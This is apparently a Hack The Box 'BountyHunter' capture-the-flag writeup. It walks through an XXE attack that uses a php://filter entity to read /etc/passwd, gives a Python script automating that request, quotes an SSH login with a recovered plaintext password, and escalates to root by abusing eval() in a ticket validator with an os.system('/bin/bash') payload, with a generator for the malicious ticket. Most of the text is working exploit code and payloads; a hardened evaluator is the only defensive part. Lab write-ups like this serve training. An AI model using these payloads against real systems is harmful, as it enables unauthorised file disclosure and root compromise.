Bounty-Hunter-HTB-Writeup

POST /tracker_diRbPr00f314.php HTTP/1.1
Host: bountyhunter.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 211
Origin: http://bountyhunter.htb
Connection: close
Referer: http://bountyhunter.htb/log_submit.php
data=PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT50ZXN0PC90aXRsZT4KCQk8Y3dlPjE8L2N3ZT4KCQk8Y3Zzcz4xPC9jdnNzPgoJCTxyZXdhcmQ%2BMTwvcmV3YXJkPgoJCTwvYnVncmVwb3J0Pg%3D%3D
The data parameter is base64 (then URL-encoded); decoded, it is the XML the bug report form submits:

<?xml  version="1.0" encoding="ISO-8859-1"?>
<bugreport>
<title>test</title>
<cwe>1</cwe>
<cvss>1</cvss>
<reward>1</reward>
</bugreport>

Read more about xxe here

Swap in a document that declares an external entity, base64-encode it again and resend it as data. The php://filter wrapper hands back the file base64-encoded, so a file containing characters such as < or & (PHP source, for example) does not break the XML parser on the server; the value reflected in the response is then decoded locally:

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
<bugreport>
<title>&xxe;</title>
<cwe>&xxe;</cwe>
<cvss>&xxe;</cvss>
<reward>&xxe;</reward>
</bugreport>
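The request above can be scripted. The following is an added example of mine, not code from the writeup: it builds the entity payload, wraps it exactly as the form does (base64 inside the data field), decodes a captured body back to XML, and pulls the reflected file out of the response. The tracker URL and field name come from the captured request; how the server renders the response is an assumption (it is assumed to echo the expanded entity back in the page), so extract_file() just takes the longest base64-looking run it finds, and SAMPLE_RESPONSE is a constructed stand-in, not a real capture.

```python
import base64
import re
import urllib.parse
import urllib.request

# From the captured request above.
TRACKER_URL = "http://bountyhunter.htb/tracker_diRbPr00f314.php"
CAPTURED_BODY = (
    "data=PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KCQk8YnVncmVwb3J0PgoJCTx0"
    "aXRsZT50ZXN0PC90aXRsZT4KCQk8Y3dlPjE8L2N3ZT4KCQk8Y3Zzcz4xPC9jdnNzPgoJCTxyZXdhcmQ%2BMTwvcmV3"
    "YXJkPgoJCTwvYnVncmVwb3J0Pg%3D%3D"
)

# Constructed stand-in for the server's reflected response (assumption: the
# server echoes the submitted fields, so the entity's content appears verbatim).
SAMPLE_RESPONSE = (
    "<tr><td>Title:</td><td>"
    + base64.b64encode(b"root:x:0:0:root:/root:/bin/bash\n").decode()
    + "</td></tr>"
)


def build_xxe_xml(path):
    """XML with an external entity that reads `path` through PHP's base64
    filter, so files containing '<' or '&' (PHP source) survive the parser."""
    return (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "
        f'"php://filter/convert.base64-encode/resource={path}"> ]>\n'
        "<bugreport>\n"
        "<title>&xxe;</title>\n"
        "<cwe>1</cwe>\n"
        "<cvss>1</cvss>\n"
        "<reward>1</reward>\n"
        "</bugreport>\n"
    )


def encode_form_data(xml):
    """The form posts the XML base64-encoded in the `data` field; return the
    x-www-form-urlencoded body exactly as the browser sends it."""
    b64 = base64.b64encode(xml.encode("latin-1")).decode("ascii")
    return urllib.parse.urlencode({"data": b64})


def decode_form_data(body):
    """Inverse of encode_form_data(): recover the XML from a captured body."""
    b64 = urllib.parse.parse_qs(body)["data"][0]
    return base64.b64decode(b64).decode("latin-1")


def extract_file(response_html):
    """Decode the base64 blob the entity expanded into, assuming the server
    reflects it; the longest base64-looking run is taken as the file."""
    runs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", response_html)
    if not runs:
        raise ValueError("no base64 payload reflected in response")
    blob = max(runs, key=len)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
    return base64.b64decode(blob).decode("utf-8", "replace")


def fetch_file(path, url=TRACKER_URL):
    """Send the XXE request and return the file's contents (needs network)."""
    body = encode_form_data(build_xxe_xml(path)).encode("ascii")
    req = urllib.request.Request(url, data=body, headers={
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
    })
    with urllib.request.urlopen(req, timeout=10) as resp:
        return extract_file(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    import sys
    print(fetch_file(sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd"))
```

Run it with a path argument once the host resolves; decode_form_data(CAPTURED_BODY) gives back the original bug report XML, which is a quick way to confirm you are wrapping the payload the same way the page does.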
Log in over SSH as development with the recovered password:

ssh development@bountyhunter.htb  passwd=m19RoAU0hP41A1sTsq6K
Hey team,

I'll be out of the office this week but please make sure that our contract with Skytrain Inc gets completed. This has been our first job since the "rm -rf" incident and we can't mess this up. Whenever one of you gets on please have a look at the internal tool they sent over. There have been a handful of tickets submitted that have been failing validation and I need you to figure out why. I set up the permissions for you to test this. Good luck.

-- John
cat /opt/skytrain_inc/ticketValidator.py
----------------------------------------
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.
def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue
        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue
        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()

Reading the script, a ticket has to satisfy all of the following:

1- The file name ends in .md (load_file refuses anything else).
2- The first line starts with # Skytrain Inc.
3- The second line starts with ## Ticket to followed by a destination; the destination is only printed back, so root works as well as any other word.
4- A line starting with __Ticket Code:__ marks the line after it as the code line.
5- That next line starts with **. With the ** stripped, everything before the first + is converted with int() and must leave a remainder of 4 when divided by 7. If it does, the whole line (minus **) is passed to eval(), and the result of that eval must be greater than 100. The eval is the bug: anything we put after the first + is executed as Python.
# Skytrain Inc   
## Ticket to root
__Ticket Code:__
**
7 x 14 = 98 and 98 + 4 = 102, so 102 % 7 == 4 and 102 is our ticket code (int() only ever sees the part before the first +).
The rest of the line goes to eval(): 102 + 1 == 103 is True, so the and operator goes on to evaluate whatever follows it, and that is where the shell goes. When that shell exits, system() returns 0, which is not greater than 100, so the script prints "Invalid ticket." afterwards; by then we already had the shell, and when the validator is run as root it is a root shell.
# Skytrain Inc   
## Ticket to root
__Ticket Code:__
**102+ 1 == 103 and __import__('os').system('/bin/bash')
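As an added example (my code, not the writeup's or the box's), the generator below builds the ticket file the validator expects and reproduces the control flow of evaluate() with the call to eval() made pluggable, so the original behaviour can be set beside a hardened evaluator that only accepts integer arithmetic. It assumes Python 3.8 or newer; the temp-directory output path, and the harmless os.getcwd() used in place of /bin/bash in the checks, are my choices.

```python
import ast
import operator
import os
import tempfile

# Field layout from ticketValidator.py above: only these prefixes are checked.
HEADER = "# Skytrain Inc"
DEST = "## Ticket to "
MARKER = "__Ticket Code:__"


def pick_code(minimum=100):
    """Smallest integer >= minimum with code % 7 == 4; pick_code(100) -> 102,
    the value used in the writeup."""
    code = minimum
    while code % 7 != 4:
        code += 1
    return code


def payload_expression(code, payload):
    """Expression for the code line: the text before the first '+' is what
    int() sees, the '== ...' comparison is True, so 'and' reaches `payload`."""
    return f"{code}+1 == {code + 1} and {payload}"


def craft_ticket(expression, destination="root"):
    """Whole ticket file; `expression` goes after the '**' on the code line."""
    return "\n".join([HEADER, DEST + destination, MARKER, "**" + expression, ""])


def evaluate_lines(lines, evaluator):
    """Same control flow as evaluate() in ticketValidator.py, with eval()
    replaced by `evaluator` so the vulnerable and hardened variants compare."""
    code_line = None
    for i, x in enumerate(lines):
        if i == 0:
            if not x.startswith(HEADER):
                return False
            continue
        if i == 1:
            if not x.startswith(DEST):
                return False
            continue
        if x.startswith(MARKER):
            code_line = i + 1
            continue
        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticket_code = x.replace("**", "").split("+")[0]
            if int(ticket_code) % 7 == 4:
                return evaluator(x.replace("**", "")) > 100
            return False
    return False


_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def safe_arith(expr):
    """Hardened replacement for eval(): integer literals joined by + - * only.
    '102+1' -> 103; names, calls, attributes, 'and' etc. raise ValueError."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError("disallowed syntax: " + type(node).__name__)
    return walk(ast.parse(expr.strip(), mode="eval"))


def hardened_evaluate(lines):
    """evaluate_lines() with the safe evaluator: a rejected expression is just
    an invalid ticket instead of code execution."""
    try:
        return evaluate_lines(lines, safe_arith)
    except ValueError:
        return False


if __name__ == "__main__":
    # Writes the writeup's ticket (code 102, /bin/bash) to a .md file; hand
    # that path to ticketValidator.py when it asks for the ticket file.
    ticket = craft_ticket(payload_expression(pick_code(), "__import__('os').system('/bin/bash')"))
    path = os.path.join(tempfile.gettempdir(), "ticket.md")
    with open(path, "w") as fh:
        fh.write(ticket)
    print(f"wrote {path}:\n{ticket}")
```

Comparison binds tighter than and, so the expression is parsed as (102+1 == 103) and (...); the payload is only reached once the comparison is True. With safe_arith in place of eval, the same ticket fails validation instead of running a shell, while a plain ticket such as **102+1 still validates.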

Respect on HTB it won’t take a minute
